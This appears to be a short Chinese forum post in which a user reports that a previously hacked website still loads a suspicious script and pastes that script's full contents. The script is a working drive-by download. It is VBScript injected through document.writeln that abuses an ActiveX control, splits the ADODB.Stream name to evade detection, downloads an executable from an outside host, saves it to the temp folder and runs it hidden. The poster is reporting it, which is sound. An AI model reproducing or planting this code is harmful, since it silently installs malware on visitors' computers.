我在h**p://www.z213.com/z213/就发现了这个,不过这网站几天前被黑过,管理员将被改动的公告区修复了,但是我22号晚上看时,网页尾部还是有:h**p://www.23597.com/pc/css.js
内容是:
document.writeln("<script language=\"VBScript\">");
document.writeln(" on error resume next");
document.writeln("dl = \"http:\/\/www.23597.com\/pc\/ms.exe\"");
document.writeln(" Set df = document.createElement(\"object\")");
document.writeln(" df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\"");
document.writeln(" str=\"Microsoft.XMLHTTP\"");
document.writeln(" Set x = df.CreateObject(str,\"\")");
document.writeln(" a1=\"Ado\"");
document.writeln(" a2=\"db.\"");
document.writeln(" a3=\"Str\"");
document.writeln(" a4=\"eam\"");
document.writeln(" str1=a1&a2&a3&a4");
document.writeln(" str5=str1");
document.writeln(" set S = df.createobject(str5,\"\")");
document.writeln(" S.type = 1");
document.writeln(" str6=\"GET\"");
document.writeln(" x.Open str6, dl, False");
document.writeln(" x.Send");
document.writeln(" fname1=\"g0ld.com\"");
document.writeln(" set F = df.createobject(\"Scripting.FileSystemObject\",\"\")");
document.writeln(" set tmp = F.GetSpecialFolder(2) ");
document.writeln(" fname1= F.BuildPath(tmp,fname1)");
document.writeln(" S.open");
document.writeln(" S.write x.responseBody");
document.writeln(" S.savetofile fname1,2");
document.writeln(" S.close");
document.writeln(" set Q = df.createobject(\"Shell.Application\",\"\")");
document.writeln(" Q.ShellExecute fname1,\"\",\"\",\"open\",0");
document.writeln(" <\/script>")不知道是管理员疏忽和还是这个网站本来就是挂着的.....